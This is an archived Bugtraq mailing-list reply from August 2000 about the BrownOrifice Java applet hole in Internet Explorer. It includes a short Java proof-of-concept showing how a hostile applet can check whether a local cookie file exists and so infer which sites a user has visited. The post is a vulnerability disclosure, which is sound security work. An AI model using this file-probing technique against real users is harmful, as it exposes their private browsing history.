Bugtraq mailing list archives

Re: BrownOrifice can break firewalls! NOW MSIE

From: "TAKAGI, Hiromitsu" <takagi () ETL GO JP>
Date: Thu, 24 Aug 2000 09:35:51 +0900

On Sun, 20 Aug 2000 10:55:59 +0300
Alexey Yarovinsky <ayarovin () OLTRES COM> wrote:

The same security hole, exists in MSIE too, with one restriction: url can't
start with file:. But still the applet from outside site, can access you
intranet servers including ftps and ALL sites you have access to. The
demonstration of the bug is here:
http://www.oltres.com/ms-bug/


"file:" url can be used to exploit. Malicious applet certainly cannot
read content of files, but it can determine whether the specified
file exists or not.

    try {
        new WURLConnection("file:/C:/WINDOWS/Cookies/default@playboy[1].txt");
    } catch (SecurityException e) {
        System.out.println("You have visited the Playboy site.");
    } catch (java.io.FileNotFoundException e) {
        System.out.println("You may not have visited the Playboy site.");
    }


Regards,
--
Hiromitsu Takagi
Electrotechnical Laboratory
http://www.etl.go.jp/~takagi/

Current thread:

BrownOrifice can break firewalls! Greulich, Andreas (Aug 10)
- Re: BrownOrifice can break firewalls! TAKAGI, Hiromitsu (Aug 14)
  - Re: BrownOrifice can break firewalls! Alexey Yarovinsky (Aug 17)
  - JDK 1.1.x Listening Socket Vulnerability (was Re: BrownOrifice can break firewalls!) TAKAGI, Hiromitsu (Aug 18)
  - Re: BrownOrifice can break firewalls! TAKAGI, Hiromitsu (Aug 25)
- Re: BrownOrifice can break firewalls! NOW MSIE Alexey Yarovinsky (Aug 21)
  - Re: BrownOrifice can break firewalls! NOW MSIE TAKAGI, Hiromitsu (Aug 23)